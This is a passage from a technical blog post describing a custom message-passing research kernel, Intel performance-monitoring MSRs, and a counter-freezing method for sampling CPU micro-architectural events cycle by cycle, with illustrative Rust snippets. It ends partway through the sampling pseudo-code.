<h1 id="cpu-architecture-summary-and-more-info">CPU architecture summary and more info</h1>
<p>That was a pretty high level introduction to many of the aspects of modern Intel CPU architecture. Every component of this diagram could have an entire blog written on it. <a href="https://software.intel.com/en-us/articles/intel-sdm">Intel Manuals</a>, <a href="https://en.wikichip.org/">WikiChip</a>, <a href="https://www.agner.org/optimize/">Agner Fog’s CPU documentation</a>, and many more, provide a more thorough documentation of Intel micro-architecture.</p>
<hr />
<h1 id="sushi-roll">Sushi Roll</h1>
<p>Sushi Roll is one of my favorite kernels! It wasn’t originally designed for CPU introspection, but it had some neat features which made it much more suitable for CPU research than my other kernels. We’ll talk a bit about why this kernel exists, and then talk about why it quickly became my go-to kernel for CPU research.</p>
<p><a href="/assets/sushi_roll_squishable.jpg"><img src="/assets/sushi_roll_squishable.jpg" /></a>
<em><sub>Kernel mascot: <a href="https://www.squishable.com/mm5/merchant.mvc?Screen=PROD&Product_Code=squish_shrimp_sushi_15">Squishable Sushi Roll</a></sub></em></p>
<h4 id="a-primer-on-knights-landing">A primer on Knights Landing</h4>
<p>Sushi Roll was originally designed for my <a href="https://gamozolabs.github.io/fuzzing/2018/10/14/vectorized_emulation.html">Vectorized Emulation</a> work. Vectorized emulation was designed for the Intel Xeon Phi (Knights Landing), which is a pretty strange architecture. Even though it’s fully-featured traditional x86, and standard software will “just work” on it, it is quite slow per individual thread. First of all, the clock rates are ~1.3 GHz, so there alone it’s about 2-3x slower than a “standard” x86 processor. Even further, it has fewer CPU resources for re-ordering and instruction decode. All-in-all the CPU is about 10x slower when running a single-threaded application compared to a “standard” 3 GHz modern Intel CPU. There’s also no L3 cache, so memory accesses can become much more expensive.</p>
<p>On top of these simple performance issues, there are more complex issues due to 4-way hyperthreading. Knights Landing was designed to be 4-way hyperthreaded (4 threads per core) to alleviate some of the performance losses of the limited instruction decode and caching. This allows threads to “block” on memory accesses while other threads with pending computations use the execution units. This 4-way hyperthreading, combined with 64-core processors, leads to 256 hardware threads showing up to your OS as cores.</p>
<p>Migrating processes and resources between these threads can be catastrophically slow. Standard shared-memory models also start to fall apart at this level of scaling (without specialized tuning). For example: If all 256 threads are hammering the same memory by performing an atomic increment (<code class="language-plaintext highlighter-rouge">lock inc</code> instruction), each individual increment will start to cost over 10,000 cycles! This is enough time for a single core on the Xeon Phi to do 640,000 single-precision floating point operations… just from a single increment! While most software treats atomics as “free locks”, they start to cause some serious cache-coherency pollution when scaled out this wide.</p>
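<p>The exact pattern that falls over at this scale is every thread doing a <code class="language-plaintext highlighter-rouge">lock</code>-prefixed read-modify-write on the same cache line. A minimal sketch of that pattern (correct, just pathological for coherency traffic — this obviously won't reproduce Xeon Phi timings on a normal machine):</p>

```rust
use std::sync::atomic::{AtomicU64, Ordering};
use std::sync::Arc;
use std::thread;

/// Have `threads` threads each perform `iters` atomic increments on one
/// shared counter -- the pattern that scales poorly on wide machines.
fn hammer_shared_counter(threads: usize, iters: u64) -> u64 {
    let counter = Arc::new(AtomicU64::new(0));
    let handles: Vec<_> = (0..threads).map(|_| {
        let counter = Arc::clone(&counter);
        thread::spawn(move || {
            for _ in 0..iters {
                // `lock inc`-style RMW: every increment bounces the cache
                // line between cores.
                counter.fetch_add(1, Ordering::Relaxed);
            }
        })
    }).collect();
    for h in handles { h.join().unwrap(); }
    counter.load(Ordering::Relaxed)
}

fn main() {
    // Always correct, but each increment serializes on the cache line
    assert_eq!(hammer_shared_counter(4, 10_000), 40_000);
}
```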
<p>Obviously with some careful development you can mitigate these issues by decreasing the frequency of shared memory accesses. But perhaps we can develop a kernel that fundamentally disallows this behavior, preventing a developer from ever starting to go down the wrong path!</p>
<h4 id="the-original-intent-of-sushi-roll">The original intent of Sushi Roll</h4>
<p>Sushi Roll was designed from the start to be a massively parallel message-passing based kernel. The most notable feature of Sushi Roll is that there is no mutable shared memory allowed (a tiny exception made for the core IPC mechanism). This means that if you ever want to share information with another processor, you must pass that information via IPC. Shared immutable memory, however, is allowed, as this doesn’t cause cache coherency traffic.</p>
<p>This design also meant that a lock never needed to be held, not even atomic-level locks using the <code class="language-plaintext highlighter-rouge">lock</code> prefix. Rather than using locks, a specific core would own a hardware resource. For example, core #0 may own the network card, or a specific queue on the network card. Instead of requesting exclusive access to the NIC by obtaining a lock, you would send a message to core #0, indicating that you want to send a packet. All of the processing of these packets is done by the sender, thus the data is already formatted in a way that can be directly dropped into the NIC ring buffers. This made the owner of a hardware resource simply a mediator, reducing the latency to that resource.</p>
<p>While this makes the internals of the kernel a bit more complex, the programming model that a developer sees is still a standard <code class="language-plaintext highlighter-rouge">send()</code>/<code class="language-plaintext highlighter-rouge">recv()</code> model. By forcing message-passing, this ensured that all software written for this kernel could be scaled between multiple machines with no modification. On a single computer there is a fast, low-latency IPC mechanism that leverages some of the abilities to share memory (by transferring ownership of physical memory to the receiver). If the target for a message resided on another computer on the network, then the message would be serialized in a way that could be sent over the network. This complexity is yet again hidden from the developer, which allows for one program to be made that is scaled out without any extra effort.</p>
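<p>A rough sketch of this ownership-plus-messaging model, using Rust's standard channels as a stand-in for the kernel's IPC mechanism (the <code class="language-plaintext highlighter-rouge">NicMessage</code> type and the packet-counting "NIC" are entirely hypothetical):</p>

```rust
use std::sync::mpsc;
use std::thread;

// Hypothetical messages other cores might send to the NIC-owning core.
enum NicMessage {
    SendPacket(Vec<u8>),
    Shutdown,
}

/// The "owner" core: the only mediator for the hardware resource it owns.
fn nic_owner(rx: mpsc::Receiver<NicMessage>) -> usize {
    let mut packets_sent = 0;
    while let Ok(msg) = rx.recv() {
        match msg {
            // The payload was already formatted by the sender; the owner
            // just drops it into the (here imaginary) NIC ring buffer.
            NicMessage::SendPacket(_payload) => packets_sent += 1,
            NicMessage::Shutdown => break,
        }
    }
    packets_sent
}

fn run() -> usize {
    let (tx, rx) = mpsc::channel();
    let owner = thread::spawn(move || nic_owner(rx));
    // Any "core" with a handle to `tx` can request a packet send
    for _ in 0..3 {
        tx.send(NicMessage::SendPacket(vec![0u8; 64])).unwrap();
    }
    tx.send(NicMessage::Shutdown).unwrap();
    owner.join().unwrap()
}

fn main() {
    assert_eq!(run(), 3);
}
```

<p>The same <code class="language-plaintext highlighter-rouge">send()</code>/<code class="language-plaintext highlighter-rouge">recv()</code> surface works whether the receiver is another core or another machine, which is exactly what makes the model transparently scalable.</p>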
<h4 id="no-interrupts-no-timers-no-software-threads-no-processes">No interrupts, no timers, no software threads, no processes</h4>
<p>Sushi Roll follows a similar model to most of my other kernels. It has no interrupts, no timers, no software threads, and no processes. These are typically required for traditional operating systems, to provide a user experience with multiple processes and users. However, my kernels are always designed for one purpose. This means the kernel boots up, and just does a given task on all cores (sometimes with one or two cores having a “special” responsibility).</p>
<p>By removing all of these external events, the CPU behaves a lot more deterministically. Sushi Roll goes the extra mile here, as it further reduces CPU noise by not having cores sharing memory and causing unexpected cache evictions or coherency traffic.</p>
<h4 id="soft-reboots">Soft Reboots</h4>
<p>Similar to kexec on Linux, my kernels always support soft rebooting. This allows the old kernel (even a double faulted/corrupted kernel) to be replaced by a new kernel. This process takes about 200-300ms to tear down the old kernel, download the new one over PXE, and run the new one. This makes it feasible to have such a specialized kernel without processes, since I can just change the code of the kernel and boot up the new one in under a second. Rapid prototyping is crucial to fast development, and without this feature this kernel would be unusable.</p>
<h4 id="sushi-roll-conclusion">Sushi Roll conclusion</h4>
<p>Sushi Roll ended up being the perfect kernel for CPU introspection. It’s the lowest noise kernel I’ve ever developed, and it happened to also be my flagship kernel right as Spectre and Meltdown came out. By not having processes, threads, or interrupts, the CPU behaves much more deterministically than in a traditional OS.</p>
<hr />
<h1 id="performance-counters">Performance Counters</h1>
<p>Before we get into how we got cycle-by-cycle micro-architectural data, we must learn a little bit about the performance monitoring available on Intel CPUs! This information can be explored in depth in the Intel System Developer Manual Volume 3b (note that the combined volume 3 manual doesn’t go into as much detail as the specific sub-volume manual).</p>
<p><img src="/assets/pmcmanual.png" alt="Performance Counter Manual" /></p>
<p>Intel CPUs have a performance monitoring subsystem relying largely on a set of model-specific-registers (MSRs). These MSRs can be configured to track certain architectural events, typically by counting them. These counters are formally “performance monitoring counters”, often referred to as “performance counters” or PMCs.</p>
<p>These PMCs vary by micro-architecture. However, over time Intel has committed to offering a small subset of counters between multiple micro-architectures. These are called architectural performance counters. The version of these architectural performance counters is found in <code class="language-plaintext highlighter-rouge">CPUID.0AH:EAX[7:0]</code>. As of this writing there are 4 versions of architectural performance monitoring. The latest version provides a decent amount of generic information useful to general-purpose optimization. However, for a specific micro-architecture, the possibilities of performance events to track are almost limitless.</p>
<h4 id="basic-usage-of-performance-counters">Basic usage of performance counters</h4>
<p>To use the performance counters on Intel there are a few steps involved. First you must find a performance event you want to monitor. This information is found in per-micro-architecture tables found in the Intel Manual Volume 3b “Performance-Monitoring Events” chapter.</p>
<p>For example, here’s a very small selection of Skylake-specific performance events:</p>
<p><img src="/assets/skylake_perfctr.png" alt="Skylake Events" /></p>
<p>Intel performance counters largely rely on two banks of MSRs. The performance event selection MSRs, where the different events are programmed using the umask and event numbers from the table above. And the performance counter MSRs which hold the counts themselves.</p>
<p>The performance event selection MSRs (<code class="language-plaintext highlighter-rouge">IA32_PERFEVTSELx</code>) start at address <code class="language-plaintext highlighter-rouge">0x186</code> and span a contiguous MSR region. The layout of these event selection MSRs varies slightly by micro-architecture. The number of counters available varies by CPU and is dynamically checked by reading <code class="language-plaintext highlighter-rouge">CPUID.0AH:EAX[15:8]</code>. The performance counter MSRs (<code class="language-plaintext highlighter-rouge">IA32_PMCx</code>) start at address <code class="language-plaintext highlighter-rouge">0xc1</code> and also span a contiguous MSR region. The counters have a micro-architecture-specific number of bits they support, found in <code class="language-plaintext highlighter-rouge">CPUID.0AH:EAX[23:16]</code>. Reading and writing these MSRs is done via the <code class="language-plaintext highlighter-rouge">rdmsr</code> and <code class="language-plaintext highlighter-rouge">wrmsr</code> instructions respectively.</p>
<p>Typically modern Intel processors support 4 PMCs, and thus will have 4 event selection MSRs (<code class="language-plaintext highlighter-rouge">0x186</code>, <code class="language-plaintext highlighter-rouge">0x187</code>, <code class="language-plaintext highlighter-rouge">0x188</code>, and <code class="language-plaintext highlighter-rouge">0x189</code>) and 4 counter MSRs (<code class="language-plaintext highlighter-rouge">0xc1</code>, <code class="language-plaintext highlighter-rouge">0xc2</code>, <code class="language-plaintext highlighter-rouge">0xc3</code>, and <code class="language-plaintext highlighter-rouge">0xc4</code>). Most processors have 48-bit performance counters. It’s important to dynamically detect this information!</p>
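<p>Decoding those <code class="language-plaintext highlighter-rouge">CPUID.0AH:EAX</code> fields is just bit extraction. A small sketch (the example <code class="language-plaintext highlighter-rouge">EAX</code> value is illustrative, not read from a live CPU):</p>

```rust
/// Decode the architectural performance monitoring fields from
/// CPUID.0AH:EAX, as described above.
fn decode_pmc_eax(eax: u32) -> (u32, u32, u32) {
    let version  = eax & 0xff;         // CPUID.0AH:EAX[7:0]  - PMC version
    let num_pmcs = (eax >> 8) & 0xff;  // CPUID.0AH:EAX[15:8] - # of counters
    let width    = (eax >> 16) & 0xff; // CPUID.0AH:EAX[23:16] - counter bits
    (version, num_pmcs, width)
}

fn main() {
    // Example EAX encoding PMC version 4, 4 counters, 48-bit counters
    assert_eq!(decode_pmc_eax(0x0730_0404), (4, 4, 48));
}
```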
<p>Here’s what the <code class="language-plaintext highlighter-rouge">IA32_PERFEVTSELx</code> MSR looks like for PMC version 3:</p>
<p><img src="/assets/perfevtsel.png" alt="Performance Event Selection" /></p>
<table>
<thead>
<tr>
<th>Field</th>
<th>Meaning</th>
</tr>
</thead>
<tbody>
<tr>
<td>Event Select</td>
<td>Holds the event number from the event tables, for the event you are interested in</td>
</tr>
<tr>
<td>Unit Mask</td>
<td>Holds the umask value from the event tables, for the event you are interested in</td>
</tr>
<tr>
<td>USR</td>
<td>If set, this counter counts during user-land code execution (ring level != 0)</td>
</tr>
<tr>
<td>OS</td>
<td>If set, this counter counts during OS execution (ring level == 0)</td>
</tr>
<tr>
<td>E</td>
<td>If set, enables edge detection of the event being tracked. Counts de-asserted to asserted transitions, which allows for timing of events</td>
</tr>
<tr>
<td>PC</td>
<td>Pin control allows for some hardware monitoring of events, like… the actual pins on the CPU</td>
</tr>
<tr>
<td>INT</td>
<td>Generate an interrupt through the APIC if an overflow occurs of the (usually 48-bit) counter</td>
</tr>
<tr>
<td>ANY</td>
<td>Increment the performance event when any hardware thread on a given physical core triggers the event, otherwise it only increments for a single logical thread</td>
</tr>
<tr>
<td>EN</td>
<td>Enable the counter</td>
</tr>
<tr>
<td>INV</td>
<td>Invert the counter mask, which changes the meaning of the <code class="language-plaintext highlighter-rouge">CMASK</code> field from a >= comparison (if this bit is 0), to a < comparison (if this bit is 1)</td>
</tr>
<tr>
<td>CMASK</td>
<td>If non-zero, the CPU only increments the performance counter when the event is triggered >= (or < if <code class="language-plaintext highlighter-rouge">INV</code> is set) <code class="language-plaintext highlighter-rouge">CMASK</code> times in a single cycle. This is useful for filtering events to more specific situations. If zero, this has no effect and the counter is incremented for each event</td>
</tr>
</tbody>
</table>
<p>And that’s about it! Find the right event you want to track in your specific micro-architecture’s table, program it in one of the <code class="language-plaintext highlighter-rouge">IA32_PERFEVTSELx</code> registers with the correct event number and umask, set the <code class="language-plaintext highlighter-rouge">USR</code> and/or <code class="language-plaintext highlighter-rouge">OS</code> bits depending on what type of code you want to track, and set the <code class="language-plaintext highlighter-rouge">EN</code> bit to enable it! Now the corresponding <code class="language-plaintext highlighter-rouge">IA32_PMCx</code> counter will be incrementing every time that event occurs!</p>
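<p>Packing those fields into an <code class="language-plaintext highlighter-rouge">IA32_PERFEVTSELx</code> value is simple bit assembly. A sketch for the PMC version 3 layout shown above (just the value construction; actually programming the MSR requires <code class="language-plaintext highlighter-rouge">wrmsr</code> in ring 0):</p>

```rust
/// Build an IA32_PERFEVTSELx value from the fields in the table above
/// (event select, unit mask, USR, OS, and EN bits; other bits left zero).
fn build_perfevtsel(event: u64, umask: u64, usr: bool, os: bool) -> u64 {
    (event & 0xff)             // Event Select: bits [7:0]
        | (umask & 0xff) << 8  // Unit Mask:    bits [15:8]
        | (usr as u64)   << 16 // USR: count ring level != 0
        | (os as u64)    << 17 // OS:  count ring level == 0
        | 1              << 22 // EN:  enable the counter
}

fn main() {
    // Event 0x3c, umask 0x00 (unhalted core cycles), counting in both
    // user and kernel mode.
    assert_eq!(build_perfevtsel(0x3c, 0x00, true, true), 0x43_003c);
}
```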
<h4 id="reading-the-pmc-counts-faster">Reading the PMC counts faster</h4>
<p>Instead of performing a <code class="language-plaintext highlighter-rouge">rdmsr</code> instruction to read the <code class="language-plaintext highlighter-rouge">IA32_PMCx</code> values, a <code class="language-plaintext highlighter-rouge">rdpmc</code> instruction can be used. This instruction is optimized to be a little bit faster and supports a “fast read mode” if <code class="language-plaintext highlighter-rouge">ecx[31]</code> is set to 1. This is typically how you’d read the performance counters.</p>
<h4 id="performance-counters-version-2">Performance Counters version 2</h4>
<p>In the second version of performance counters, Intel added a bunch of new features.</p>
<p>Intel added some fixed performance counters (<code class="language-plaintext highlighter-rouge">IA32_FIXED_CTR0</code> through <code class="language-plaintext highlighter-rouge">IA32_FIXED_CTR2</code>, starting at address <code class="language-plaintext highlighter-rouge">0x309</code>) which are not programmable. These are configured by <code class="language-plaintext highlighter-rouge">IA32_FIXED_CTR_CTRL</code> at address <code class="language-plaintext highlighter-rouge">0x38d</code>. Unlike normal PMCs, these cannot be programmed to count any event. Rather, the controls for these only allow selecting which CPU ring level they increment at (or none to disable them), and whether or not they trigger an interrupt on overflow. No other control is provided for these.</p>
<table>
<thead>
<tr>
<th>Fixed Performance Counter</th>
<th>MSR</th>
<th>Meaning</th>
</tr>
</thead>
<tbody>
<tr>
<td>IA32_FIXED_CTR0</td>
<td>0x309</td>
<td>Counts number of retired instructions</td>
</tr>
<tr>
<td>IA32_FIXED_CTR1</td>
<td>0x30a</td>
<td>Counts number of core cycles while the processor is not halted</td>
</tr>
<tr>
<td>IA32_FIXED_CTR2</td>
<td>0x30b</td>
<td>Counts number of timestamp counts (TSC) while the processor is not halted</td>
</tr>
</tbody>
</table>
<p>These are then enabled and disabled by:</p>
<p><img src="/assets/fixedctrctrl.png" alt="Fixed Counter Control" /></p>
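<p>As a sketch of that control layout: each fixed counter gets a 4-bit field in <code class="language-plaintext highlighter-rouge">IA32_FIXED_CTR_CTRL</code> at offset <code class="language-plaintext highlighter-rouge">4 * index</code>, with bits for ring-0 counting, ring-&gt;0 counting, and PMI-on-overflow. This just builds the value (writing it requires <code class="language-plaintext highlighter-rouge">wrmsr</code> in ring 0):</p>

```rust
/// Build an IA32_FIXED_CTR_CTRL value. Each fixed counter gets a 4-bit
/// field at offset `4 * index`: bit 0 counts in ring 0 (OS), bit 1 counts
/// in rings > 0 (USR), bit 3 requests a PMI on overflow.
fn fixed_ctr_ctrl(counters: &[(usize, bool, bool, bool)]) -> u64 {
    let mut value = 0;
    for &(index, os, usr, pmi) in counters {
        let field = (os as u64) | (usr as u64) << 1 | (pmi as u64) << 3;
        value |= field << (4 * index);
    }
    value
}

fn main() {
    // Enable all three fixed counters in both user and kernel mode,
    // without overflow interrupts.
    let ctrl = fixed_ctr_ctrl(&[(0, true, true, false),
                                (1, true, true, false),
                                (2, true, true, false)]);
    assert_eq!(ctrl, 0x333);
}
```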
<p>The second version of performance counters also added 3 new MSRs that allow “bulk management” of performance counters. Rather than checking the status and enabling/disabling each performance counter individually, Intel added 3 global control MSRs. These are <code class="language-plaintext highlighter-rouge">IA32_PERF_GLOBAL_CTRL</code> (address <code class="language-plaintext highlighter-rouge">0x38f</code>) which allows enabling and disabling performance counters in bulk. <code class="language-plaintext highlighter-rouge">IA32_PERF_GLOBAL_STATUS</code> (address <code class="language-plaintext highlighter-rouge">0x38e</code>) which allows checking the overflow status of all performance counters in one <code class="language-plaintext highlighter-rouge">rdmsr</code>. And <code class="language-plaintext highlighter-rouge">IA32_PERF_GLOBAL_OVF_CTRL</code> (address <code class="language-plaintext highlighter-rouge">0x390</code>) which allows for resetting the overflow status of all performance counters in one <code class="language-plaintext highlighter-rouge">wrmsr</code>. Since <code class="language-plaintext highlighter-rouge">rdmsr</code> and <code class="language-plaintext highlighter-rouge">wrmsr</code> are serializing instructions, these can be quite expensive, and being able to reduce the number of them is important!</p>
<p>Global control (simple, allows masking of individual counters from one MSR):</p>
<p><img src="/assets/perfglobalctrl.png" alt="Performance Global Control" /></p>
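<p>The global control value itself is just two bitmasks: the low bits enable the programmable counters, and bits 32 and up enable the fixed counters. A sketch of building an "everything on" value:</p>

```rust
/// Build an IA32_PERF_GLOBAL_CTRL value: bits [num_pmcs-1:0] enable the
/// programmable counters, bits [32+num_fixed-1:32] enable the fixed ones.
fn perf_global_ctrl(num_pmcs: u32, num_fixed: u32) -> u64 {
    let pmc_mask   = (1u64 << num_pmcs) - 1;
    let fixed_mask = ((1u64 << num_fixed) - 1) << 32;
    pmc_mask | fixed_mask
}

fn main() {
    // 4 programmable + 3 fixed counters, all enabled in one wrmsr.
    assert_eq!(perf_global_ctrl(4, 3), 0x7_0000_000f);
}
```

<p>The counter counts should come from <code class="language-plaintext highlighter-rouge">CPUID.0AH</code> rather than being hardcoded.</p>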
<p>Status (tracks overflows of various counters, with a global condition changed tracker):</p>
<p><img src="/assets/perfglobalstatus.png" alt="Performance Global Status" /></p>
<p>Status control (writing a <code class="language-plaintext highlighter-rouge">1</code> to any of these bits clears the corresponding bit in <code class="language-plaintext highlighter-rouge">IA32_PERF_GLOBAL_STATUS</code>):</p>
<p><img src="/assets/perfglobalstatusctrl.png" alt="Performance Global Status" /></p>
<p>Finally, Intel added 2 bits to the existing <code class="language-plaintext highlighter-rouge">IA32_DEBUGCTL</code> MSR (address <code class="language-plaintext highlighter-rouge">0x1d9</code>). These 2 bits <code class="language-plaintext highlighter-rouge">Freeze_LBR_On_PMI</code> (bit 11) and <code class="language-plaintext highlighter-rouge">Freeze_PerfMon_On_PMI</code> (bit 12) allow freezing of last branch recording (LBR) and performance monitoring on performance monitor interrupts (often due to overflows). These are designed to reduce the measurement of the interrupt itself when an overflow condition occurs.</p>
<h4 id="performance-counters-version-3">Performance Counters version 3</h4>
<p>Performance counters version 3 was pretty simple. Intel added the <code class="language-plaintext highlighter-rouge">ANY</code> bit to <code class="language-plaintext highlighter-rouge">IA32_PERFEVTSELx</code> and <code class="language-plaintext highlighter-rouge">IA32_FIXED_CTR_CTRL</code> to allow tracking of performance events on any thread on a physical core. Further, the performance counters went from a fixed number of 2 counters, to a variable number of counters. This resulted in more bits being added to the global status, overflow, and overflow control MSRs, to control the corresponding counters.</p>
<p><img src="/assets/perfv3globals.png" alt="Performance Global Status" /></p>
<h4 id="performance-counters-version-4">Performance Counters version 4</h4>
<p>Performance counters version 4 is pretty complex in detail, but ultimately it’s fairly simple. Intel renamed some of the MSRs (for example <code class="language-plaintext highlighter-rouge">IA32_PERF_GLOBAL_OVF_CTRL</code> became <code class="language-plaintext highlighter-rouge">IA32_PERF_GLOBAL_STATUS_RESET</code>). Intel also added a new MSR <code class="language-plaintext highlighter-rouge">IA32_PERF_GLOBAL_STATUS_SET</code> (address <code class="language-plaintext highlighter-rouge">0x391</code>) which instead of clearing the bits in <code class="language-plaintext highlighter-rouge">IA32_PERF_GLOBAL_STATUS</code>, allows for setting of the bits.</p>
<p>Further, the freezing behavior enabled by <code class="language-plaintext highlighter-rouge">IA32_DEBUGCTL.Freeze_LBR_On_PMI</code> and <code class="language-plaintext highlighter-rouge">IA32_DEBUGCTL.Freeze_PerfMon_On_PMI</code> was streamlined to have a single bit which tracks the “freeze” state of the PMCs, rather than clearing the corresponding bits in the <code class="language-plaintext highlighter-rouge">IA32_PERF_GLOBAL_CTRL</code> MSR. This change is awesome as it reduces the cost of freezing and unfreezing the performance monitoring unit (PMU), but it’s actually a breaking change from previous versions of performance counters.</p>
<p>Finally, they added a mechanism to allow sharing of performance counters between multiple users. This is not really relevant to anything we’re going to talk about, so we won’t go into details.</p>
<h4 id="conclusion">Conclusion</h4>
<p>Performance counters started off pretty simple, but Intel added more and more features over time. However, these “new” features are critical to what we’re about to do next :)</p>
<hr />
<h1 id="cycle-by-cycle-micro-architectural-sampling">Cycle-by-cycle micro-architectural sampling</h1>
<p>Now that we’ve gotten some prerequisites out of the way, lets talk about the main course of this blog: A creative use of performance counters to get cycle-by-cycle micro-architectural information out of Intel CPUs!</p>
<p>It’s important to note that this technique is meant to assist in finding and learning things about CPUs. The data it generates is not particularly easy to interpret or work with, and there are many pitfalls to be aware of!</p>
<h4 id="the-goal">The Goal</h4>
<p>Performance counters are incredibly useful in categorizing micro-architectural behavior on an Intel CPU. However, these counters are often used over a block of code or an entire program, and viewed as a single data point over the whole run. For example, one might use performance counters to track the number of times there’s a cache miss in their program under test. This will give a single number as an output, giving an indication of how many times the cache was missed, but it doesn’t help much in telling you when they occurred. By some binary searching (or creative use of counter overflows) you can get a general idea of when the event occurred, but I wanted more information.</p>
<p>More specifically, I wanted to view micro-architectural data on a graph, where the x-axis was in cycles. This would allow me to see (with cycle-level granularity) when certain events happened in the CPU.</p>
<h4 id="the-idea">The Idea</h4>
<p>We’ve set a pretty lofty goal for ourselves. We effectively want to link two performance counters with each other. In this case we want to use an arbitrary performance counter for some event we’re interested in, and we want to link it to a performance counter tracking the number of cycles elapsed. However, there doesn’t seem to be a direct way to perform this linking.</p>
<p>We know that we can have multiple performance counters, so we can configure one to count a given event, and another to count cycles. However, in this case we’re not able to capture information at each cycle, as we have no way of reading these counters together. We also cannot stop the counters ourselves, as stopping the counters requires injecting a <code class="language-plaintext highlighter-rouge">wrmsr</code> instruction which cannot be done on an arbitrary cycle boundary, and definitely cannot be done during speculation.</p>
<p>But there’s a small little trick we can use. We can stop multiple performance counters at the same time by using the <code class="language-plaintext highlighter-rouge">IA32_DEBUGCTL.Freeze_PerfMon_On_PMI</code> feature. When a counter ends up overflowing, an interrupt occurs (if configured as such). When this overflow occurs, the freeze bit in <code class="language-plaintext highlighter-rouge">IA32_PERF_GLOBAL_STATUS</code> is set (version 4 PMCs specific feature), causing <em>all</em> performance counters to stop.</p>
<p>This means that if we can cause an overflow on each cycle boundary, we could potentially capture the time <em>and</em> the event we’re interested in at the same time. Doing this isn’t too difficult either, we can simply pre-program the performance counter value <code class="language-plaintext highlighter-rouge">IA32_PMCx</code> to <code class="language-plaintext highlighter-rouge">N</code> away from overflow. In our specific case, we’re dealing with a 48-bit performance counter. So in theory if we program PMC0 to count number of cycles, set the counter to <code class="language-plaintext highlighter-rouge">2^48 - N</code> where <code class="language-plaintext highlighter-rouge">N</code> is >= 1, we can get an interrupt, and thus an “atomic” disabling of performance counters after <code class="language-plaintext highlighter-rouge">N</code> cycles.</p>
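<p>Computing that pre-load value is a one-liner, but it's worth pinning down since the counter width is micro-architecture specific. A sketch, with the 48-bit width hardcoded for illustration (it should really come from <code class="language-plaintext highlighter-rouge">CPUID.0AH:EAX[23:16]</code>):</p>

```rust
/// Compute the value to pre-load into a 48-bit IA32_PMCx such that the
/// counter overflows (and, with Freeze_PerfMon_On_PMI, freezes the PMU)
/// after `n` more counted events.
fn preload_for_overflow_in(n: u64) -> u64 {
    // Width assumed here; dynamically detect via CPUID.0AH:EAX[23:16]
    const COUNTER_BITS: u64 = 48;
    assert!(n >= 1 && n < (1 << COUNTER_BITS));
    (1u64 << COUNTER_BITS) - n
}

fn main() {
    // Overflow after a single cycle:
    assert_eq!(preload_for_overflow_in(1), 0xffff_ffff_ffff);
    // Overflow after 100 cycles:
    assert_eq!(preload_for_overflow_in(100), 0xffff_ffff_ff9c);
}
```

<p>Sweeping <code class="language-plaintext highlighter-rouge">n</code> from 1 upwards over repeated runs is what gives the cycle-by-cycle sampling described below.</p>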
<p>If we set up a deterministic enough execution environment, we can run the same code over and over, while adjusting <code class="language-plaintext highlighter-rouge">N</code> to sample the code at a different cycle count.</p>
<p>This relies on a lot of assumptions. We’re assuming that the freeze bit ends up disabling both performance counters at the same time (“atomically”), we’re assuming we can cause this interrupt on an arbitrary cycle boundary (even during multi-cycle instructions), and we also are assuming that we can execute code in a clean enough environment where we can do multiple runs measuring different cycle offsets.</p>
<p>So… lets try it!</p>
<h1 id="the-implementation">The Implementation</h1>
<p>A simple pseudo-code implementation of this sampling method looks as such:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">/// Number of times we want to sample each data point. This allows us to look</span>
<span class="c">/// for the minimum, maximum, and average values. This also gives us a way to</span>
<span class="c">/// verify that the environment we're in is deterministic and the results are</span>
<span class="c">/// sane. If minimum == maximum over many samples, it's safe to say we have a</span>
<span class="c">/// very clear picture of what is happening.</span>
<span class="k">const</span> <span class="n">NUM_SAMPLES</span><span class="p">:</span> <span class="nb">u64</span> <span class="o">=</span> <span class="mi">1000</span><span class="p">;</span>
<span class="c">/// Maximum number of cycles to sample on the x-axis. This limits the sampling</span>
<span class="c">/// space.</span>
<span class="k">const</span> <span class="n">MAX_CYCLES</span><span class="p">:</span> <span class="nb">u64</span> <span class="o">=</span> <span class="mi">1000</span><span class="p">;</span>
<span class="c">// Program the APIC to map the performance counter overflow interrupts to a</span>
<span class="c">// stub assembly routine which simply `iret`s out</span>
<span class="nf">configure_pmc_interrupts_in_apic</span><span class="p">();</span>
<span class="c">// Configure performance counters to freeze on interrupts</span>
<span class="nf">perf_freeze_on_overflow</span><span class="p">();</span>
<span class="c">// Iterate through each performance counter we want to gather data on</span>
<span class="k">for</span> <span class="n">perf_counter</span> <span class="n">in</span> <span class="n">performance_counters_of_interest</span> <span class="p">{</span>
<span class="c">// Disable and reset all performance counters individually</span>
<span class="c">// Clearing their counts to 0, and clearing their event select MSRs to 0</span>
<span class="nf">disable_all_perf_counters</span><span class="p">();</span>
<span class="c">// Disable performance counters globally by setting IA32_PERF_GLOBAL_CTRL</span>
<span class="c">// to 0</span>
<span class="nf">disable_perf_globally</span><span class="p">();</span>
<span class="c">// Enable a performance counter (lets say PMC0) to track the `perf_counter`</span>
<span class="c">// we're interested in. Note that this doesn't start the counter yet, as we</span>
<span class="c">// still have the counters globally disabled.</span>
<span class="nf">enable_perf_counter</span><span class="p">(</span><span class="n">perf_counter</span><span class="p">);</span>
<span class="c">// Go through each number of samples we want to collect for this performance</span>
<span class="c">// counter... for each cycle offset.</span>
<span class="k">for</span> <span class="mi">_</span> <span class="n">in</span> <span class="mi">0</span><span class="o">..</span><span class="n">NUM_SAMPLES</span> <span class="p">{</span>
<span class="c">// Go through each cycle we want to observe</span>
<span class="k">for</span> <span class="n">cycle_offset</span> <span class="n">in</span> <span class="mi">1</span><span class="o">..=</span><span class="n">MAX_CYCLES</span> <span class="p">{</span>
<span class="c">// Clear out the performance counter values: IA32_PMCx fields</span>
<span class="nf">clear_perf_counters</span><span class="p">();</span>
<span class="c">// Program fixed counter #1 (un-halted cycle counter) to trigger</span>
<span class="c">// an interrupt on overflow. This will cause an interrupt, which</span>
<span class="c">// will then cause a freeze of all PMCs.</span>
<span class="nf">program_fixed1_interrupt_on_overflow</span><span class="p">();</span>
<span class="c">// Program the fixed counter #1 (un-halted cycle counter) to</span>
<span class="c">// `cycles` prior to overflowing</span>
<span class="nf">set_fixed1_value</span><span class="p">((</span><span class="mi">1</span> <span class="o"><<</span> <span class="mi">48</span><span class="p">)</span> <span class="o">-</span> <span class="n">cycle_offset</span><span class="p">);</span>
<span class="c">// Do some pre-test environment setup. This is important to make</span>
<span class="c">// sure we can sample the code under test multiple times and get</span>
<span class="c">// the same result. Here is where you'd be flushing cache lines,</span>
<span class="c">// maybe doing a `wbinvd`, etc.</span>
<span class="nf">set_up_environment</span><span class="p">();</span>
<span class="c">// Enable both the fixed #1 cycle counter and the PMC0 performance</span>
